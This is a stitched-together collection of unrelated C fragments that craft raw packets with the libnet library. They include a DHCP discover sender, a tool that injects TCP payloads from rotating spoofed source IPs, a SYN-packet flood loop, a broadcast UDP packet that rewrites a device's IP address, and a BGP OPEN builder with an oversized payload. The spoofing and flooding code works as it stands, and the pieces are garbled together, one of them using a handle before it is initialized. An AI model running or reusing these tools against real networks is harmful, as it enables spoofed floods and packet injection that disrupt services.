// we are a discover packet options = malloc(3); options[i++] = LIBNET_DHCP_MESSAGETYPE; // type options[i++] = 1; // len options[i++] = LIBNET_DHCP_MSGDISCOVER; // data orig_len = options_len; options_len += sizeof(options_req) + 2; // update total payload size // workaround for realloc on old machines // options = realloc(options, options_len); // resize options buffer tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; // we are going to request some parameters options[i++] = LIBNET_DHCP_PARAMREQUEST; // type options[i++] = sizeof(options_req); // len memcpy(options + i, options_req, sizeof(options_req)); // data i += sizeof(options_req); // if we have an ip already, let's request it. if (src_ip) { orig_len = options_len; options_len += 2 + sizeof(src_ip); // workaround for realloc on old machines // options = realloc(options, options_len); tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; options[i++] = LIBNET_DHCP_DISCOVERADDR; // type options[i++] = sizeof(src_ip); // len memcpy(options + i, (char *)&src_ip, sizeof(src_ip));// data i += sizeof(src_ip); } // end our options packet options[i] = LIBNET_DHCP_END; // make sure we are at least the minimum length, if not fill // this could go in libnet, but we will leave it in the app for now if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN) { orig_len = options_len; options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H; // workaround for realloc on old machines // options = realloc(options, options_len); tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; memset(options + i, 0, options_len - i); } // the goodies are here dhcp = libnet_build_dhcpv4( LIBNET_DHCP_REQUEST, // opcode 1, // hardware type 6, // hardware address length 0, // hop count 0xdeadbeef, // transaction id 0, // seconds since bootstrap 0x8000, // flags 0, // client ip 0, // your ip 0, // server ip 0, // gateway ip ethaddr->ether_addr_octet, // client hardware addr NULL, // server host name NULL, // boot file options, // dhcp options stuck in payload since it is dynamic options_len, // length of options l, // libnet handle 0); // libnet id // wrap it udp = libnet_build_udp( 68, // source port 67, // destination port LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // packet size 0, // checksum NULL, // payload 0, // payload size l, // libnet handle 0); // libnet id // hook me up with some ipv4 ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // length 0x10, // TOS 0, // IP ID 0, // IP Frag 16, // TTL IPPROTO_UDP, // protocol 0, // checksum src_ip, // src ip inet_addr("255.255.255.255"), // destination ip NULL, // payload 0, // payload size l, // libnet handle 0); // libnet id // we can just autobuild since we arent doing anything tricky t = libnet_autobuild_ethernet( enet_dst, // ethernet destination ETHERTYPE_IP, // protocol type l); // libnet handle // write to the wire if (libnet_write(l) == -1) { fprintf(stderr, " %s: libnet_write: %s\n", argv[0], strerror(errno)); exit(EXIT_FAILURE); } // fill and print stats libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %ld\n" "Packet errors: %ld\n" "Bytes written: %ld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); // free mem free(options); exit(0); } exit(0); }
int main(int argc, char *argv[]) { int c, i; u_char *cp; libnet_t *l; libnet_ptag_t ip; libnet_ptag_t tcp; struct libnet_stats ls; u_long nround; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char opt[20]; char errbuf[LIBNET_ERRBUF_SIZE]; FILE *dmf, *nsf, *srcf; char *dms[MAXLINES], *nss[MAXLINES], *srcs[MAXLINES]; int pay_s[MAXLINES]; char *dmfn = "kw.txt"; char *nsfn = "dst.txt"; char *srcfn = "src.txt"; char *paybuf, *pp; int jd = 0; int jn = 0; int js = 0; int kd, kn; u_char bt; char lb[80]; char linebuf[80]; char payld[100], tpayld[100]; /* Read the keywords, dest IPs, src IPs , and construct http payload */ if( (dmf = fopen(dmfn, "r")) == NULL) { fprintf(stderr, "Error opening key word file %s \n", dmfn); exit(1); } /* end if */ if( (nsf = fopen(nsfn, "r")) == NULL) { fprintf(stderr, "Error opening file %s \n", nsfn); exit(1); } /* end if */ if( (srcf = fopen(srcfn, "r")) == NULL) { fprintf(stderr, "Error opening file %s \n", srcfn); exit(1); } /* end if */ printf("Reading key words ...\n"); while ((jd < MAXLINES) && (fgets(lb, 80, dmf)!=0) ) { kd = 0; kn = 0; while (lb[kd] != '\0') { /* get rid of space and CR */ linebuf[kn++] = lb[kd++]; } /* end while */ linebuf[kn] = '\0'; paybuf = linebuf; if (kn != 0) { /* not empty line */ /* convert line into http query payload */ dms[jd] = (char *)malloc(strlen(paybuf)+1); /* alloc mem */ strcpy(dms[jd], paybuf); pay_s[jd] = strlen(dms[jd]); /* ===== for message body debugging */ for (kn=0; kn < pay_s[jd]; kn++) { bt = *(dms[jd] + kn); printf(" %02X", bt); } printf("\n"); /*=== */ jd++; } /* end if */ } /* end while */ printf("Total http requests: %d\n", jd); fclose(dmf); js=0; printf("Reading spoofed source IPs ... \n"); while ((js < MAXLINES) && (fgets(lb, 80, srcf)!=0) ) { kd = 0; kn = 0; while (lb[kd] != '\0') { /* get rid of space and CR */ if ((lb[kd] != ' ') && (lb[kd] != '\n')) { linebuf[kn] = lb[kd]; kn++; } /* end if */ kd++; } /* end while */ linebuf[kn] = '\0'; if (kn != 0) { /* not empty line */ srcs[js] = (char *)malloc(strlen(linebuf)+1); strcpy(srcs[js++], linebuf); /* printf("%s\n", srcs[js-1]); */ } /* end if */ } /* end while */ printf("Total source IPs: %d\n", js); fclose(srcf); jn = 0; printf("Reading dst IPs ... \n"); while ((jn < MAXLINES) && (fgets(lb, 80, nsf)!=0) ) { kd = 0; kn = 0; while (lb[kd] != '\0') { /* get rid of space and CR */ if ((lb[kd] != ' ') && (lb[kd] != '\n')) { linebuf[kn] = lb[kd]; kn++; } /* end if */ kd++; } /* end while */ linebuf[kn] = '\0'; if (kn != 0) { /* not empty line */ nss[jn] = (char *)malloc(strlen(linebuf)+1); strcpy(nss[jn++], linebuf); /* printf("%s\n", nss[jn-1]); */ } /* end if */ } /* end while */ printf("Total dst IPs: %d\n", jn); fclose(nsf); nround = 0; /* while(1) { non-stop sending ... */ /* Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } libnet_seed_prand(l); tcp = 0; ip = 0; for(kd=0; kd < jd; kd++) { /* loop over all http reqs */ for(kn=0; kn < jn; kn++) { /* loop over all dst IPs */ if ((dst_ip = libnet_name2addr4(l, nss[kn], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad dest IP address: %s\n", nss[kn]); exit(EXIT_FAILURE); } /* end if */ /* printf("feeding %s for keyword %s ...\n", nss[kn], dms[kd]); */ i = (int)(libnet_get_prand(LIBNET_PRu16)/65535.0*(js-1)); /* Randsrc ip */ src_ip = libnet_name2addr4(l, srcs[i], LIBNET_RESOLVE); /* src ip */ printf("using source IP %s ...\n", srcs[i]); src_prt = libnet_get_prand(LIBNET_PRu16); /* Random source port */ dst_prt = 1234; /* http */ /* Building TCP */ tcp = libnet_build_tcp( src_prt, /* source port */ dst_prt, /* destination port */ libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), 0x18, /* (PSH, ACK) */ libnet_get_prand(LIBNET_PRu16), /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + pay_s[kd], /* packet length */ dms[kd], /* payload */ pay_s[kd], /* payload size */ l, /* libnet handle */ tcp); /* libnet id */ if (tcp == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } /* Building IP */ ip = libnet_build_ipv4( LIBNET_IPV4_H + pay_s[kd] + LIBNET_TCP_H, /* length */ 0x00, /* TOS */ 0, /* IP ID */ 0x4000, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, dst_ip, NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ ip); /* libnet id */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { /* printf("Wrote %d byte TCP packet; check the wire.\n", c); */ } usleep(20); /* slow down to conserve bandwidth */ } /* end for */ } /* end for */ libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %ld\n" "Packet errors: %ld\n" "Bytes written: %ld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); nround++; printf("====== Round %ld sent ================\n", nround); /* } end of while loop */ return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int main(int argc, char *argv[]) { int c, i; u_char *cp; libnet_t *l; libnet_ptag_t ip; libnet_ptag_t tcp; struct libnet_stats ls; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char opt[20]; char errbuf[LIBNET_ERRBUF_SIZE]; FILE *dmf; char *dms; int pay_s; char *dmfn = "kw.txt"; char *paybuf, *pp; u_char bt; char linebuf[MAXTEXT]; /* Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } libnet_seed_prand(l); tcp = 0; ip = 0; dst_ip = libnet_get_prand(LIBNET_PRu32); src_ip = libnet_get_prand(LIBNET_PRu32); src_prt = libnet_get_prand(LIBNET_PRu16); dst_prt = 80; /* http */ while ((c = getopt(argc, argv, "d:s:p:f:")) != EOF) { switch (c) { case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'p': dst_prt = (u_short)atoi(optarg); printf("Dest port: %d\n", dst_prt); break; case 'f': dmfn = optarg; printf("File name: %s\n", dmfn); break; default: exit(EXIT_FAILURE); } } /* Read the keywords, dest IPs, src IPs , and construct http payload */ if( (dmf = fopen(dmfn, "r")) == NULL) { fprintf(stderr, "Error opening the content file %s \n", dmfn); exit(1); } /* end if */ printf("Reading content ...\n"); i = 0; while ((i < MAXTEXT) && ( (c=fgetc(dmf)) != EOF ) ) { linebuf[i++] = c; } fclose(dmf); linebuf[i] = '\0'; paybuf = linebuf; dms = (char *)malloc(strlen(paybuf)+1); /* alloc mem */ strcpy(dms, paybuf); pay_s = strlen(dms); /* ===== for message body debugging */ printf("Content read:\n"); for (i=0; i < pay_s; i++) { bt = *(dms + i); printf(" %02X", bt); } printf("\n"); /*=== */ /* Building TCP */ tcp = libnet_build_tcp( src_prt, /* source port */ dst_prt, /* destination port */ libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), 0x18, /* (PSH, ACK) */ libnet_get_prand(LIBNET_PRu16), /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + pay_s, /* packet length */ dms, /* payload */ pay_s, /* payload size */ l, /* libnet handle */ tcp); /* libnet id */ if (tcp == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } /* Building IP */ ip = libnet_build_ipv4( LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */ 0x00, /* TOS */ 0, /* IP ID */ 0x4000, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, dst_ip, NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ ip); /* libnet id */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { /* printf("Wrote %d byte TCP packet; check the wire.\n", c); */ } /* usleep(20); slow down to conserve bandwidth */ libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %ld\n" "Packet errors: %ld\n" "Bytes written: %ld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int main (int argc, char *argv[]) { libnet_t *p; libnet_ptag_t ip, udp, ipoptions, ether; u_long srcip, dstip; u_short srcport = 62976, dstport = 62976, x; signed int ret; char errbuff[LIBNET_ERRBUF_SIZE], ipopt[21]; int len; int8_t *macdst = "ff:ff:ff:ff:ff:ff"; u_int8_t *macdest; char payload[128] = "\xfd\xfd\x00\x04\x00\x03\x00\x0f\x3d\x56\x97\x07" "\x0a\x00\x32\x32" /* ip address to set too */ "\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00"; u_short payloadlen = strlen(payload); srcip = libnet_get_ipaddr4(p); /* mod to spoof */ dstip = libnet_name2addr4(p,"255.255.255.255",LIBNET_DONT_RESOLVE); /* 255.255.255.255 */ udp = ip = ether = ipoptions = 0; if ( (macdest = libnet_hex_aton(macdst,&len)) == NULL) { fprintf(stderr,"cant get mac str - %s",libnet_geterror(p)); exit (1); } if ( (p = libnet_init (LIBNET_LINK, NULL, errbuff)) == NULL) { fprintf(stderr,"cant init() - %s\n",errbuff); exit (1); } if ( (udp = libnet_build_udp(srcport,dstport,LIBNET_UDP_H + payloadlen,0,payload,payloadlen,p,udp)) == -1) { fprintf(stderr,"cant build udp - %s\n",libnet_geterror(p)); exit (1); } for (x=0;x<20;x++) { ipopt[x] = libnet_get_prand(LIBNET_PR2); } ipoptions = libnet_build_ipv4_options (ipopt,20,p,ipoptions); if ( (ip = libnet_build_ipv4 (LIBNET_IPV4_H + 20 + payloadlen + LIBNET_UDP_H,0,250,0,128,IPPROTO_UDP,0,srcip,dstip,payload,payloadlen,p,ip)) == -1) { fprintf(stderr,"cant build ipv4 - %s\n",libnet_geterror(p)); exit (1); } if ((ether = libnet_build_ethernet (macdest,macdest,ETHERTYPE_IP,NULL,0,p,ether)) == -1) { fprintf(stderr,"cant build ether - %s",libnet_geterror(p)); exit (1); } //libnet_diag_dump_pblock(p); if ( (ret = libnet_write(p)) == -1) { fprintf(stderr,"%s\n",libnet_geterror(p)); } free(macdest); /* hex_aton malloc's - see libnet doco */ libnet_destroy(p); return 0; }
int main(int argc, char *argv[]) { int c; libnet_t *l; u_long src_ip, dst_ip, length; libnet_ptag_t t = 0; char errbuf[LIBNET_ERRBUF_SIZE]; u_char *payload = NULL; u_long payload_s = 0; u_char marker[LIBNET_BGP4_MARKER_SIZE]; printf("libnet 1.1 packet shaping: BGP4 open + payload[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } src_ip = 0; dst_ip = 0; memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE); while ((c = getopt(argc, argv, "d:s:t:m:p:S:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'm': memcpy(marker, optarg, LIBNET_BGP4_MARKER_SIZE); break; case 'p': payload = (u_char *)optarg; break; case 'S': payload_s = atoi(optarg); break; default: exit(EXIT_FAILURE); } } if (!src_ip || !dst_ip) { usage(argv[0]); goto bad; } if (payload_s && !payload) { payload = (u_char *)malloc(payload_s); if (!payload) { printf("memory allocation failed (%ld bytes requested)\n", payload_s); goto bad; } memset(payload, 0x41, payload_s); } if (payload && !payload_s) { payload_s = strlen((char *)payload); } length = LIBNET_BGP4_OPEN_H + payload_s; t = libnet_build_bgp4_open( 4, /* version */ 0x3412, /* my AS */ 0x7856, /* hold time */ 0xefbeadde, /* BGP id */ payload_s, /* options length */ payload, /* payload */ payload_s, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build BGP4 open header: %s\n", libnet_geterror(l)); goto bad; } length+=LIBNET_BGP4_HEADER_H; t = libnet_build_bgp4_header( marker, /* marker */ length, /* length */ LIBNET_BGP4_OPEN, /* message type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l)); goto bad; } length+=LIBNET_TCP_H; t = libnet_build_tcp( 0x6666, /* source port */ 179, /* destination port */ 0x01010101, /* sequence number */ 0x02020202, /* acknowledgement num */ TH_SYN, /* control flags */ 32767, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ length, /* TCP packet size */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } length+=LIBNET_IPV4_H; t = libnet_build_ipv4( length, /* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
void send_packets(libnet_t *lnet_handle, u_int32_t src, u_int32_t dst, u_short src_port, u_short dst_port, unsigned int amount, useconds_t interval) { libnet_ptag_t tcp = LIBNET_PTAG_INITIALIZER, ip = LIBNET_PTAG_INITIALIZER; while (*count < amount) { tcp = libnet_build_tcp( src_port, dst_port, 0, 0, TH_SYN, 1024, 0, 0, LIBNET_TCP_H, NULL, 0, lnet_handle, tcp); ip = libnet_build_ipv4( LIBNET_TCP_H + LIBNET_IPV4_H, /* length */ 0, /* TOS */ 0, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src, /* source IP */ dst, /* destination IP */ NULL, /* payload */ 0, /* payload size */ lnet_handle, /* libnet context */ ip); /* ptag */ if (ip == -1) { fprintf(stderr, "Can't build IP: %s.\n", libnet_geterror(lnet_handle)); exit(EXIT_FAILURE); } int res = libnet_write(lnet_handle); if (res == -1) { fprintf(stderr, "libnet_write: %s.\n", libnet_geterror(lnet_handle)); exit(EXIT_FAILURE); } if (interval > 0) usleep(interval); } }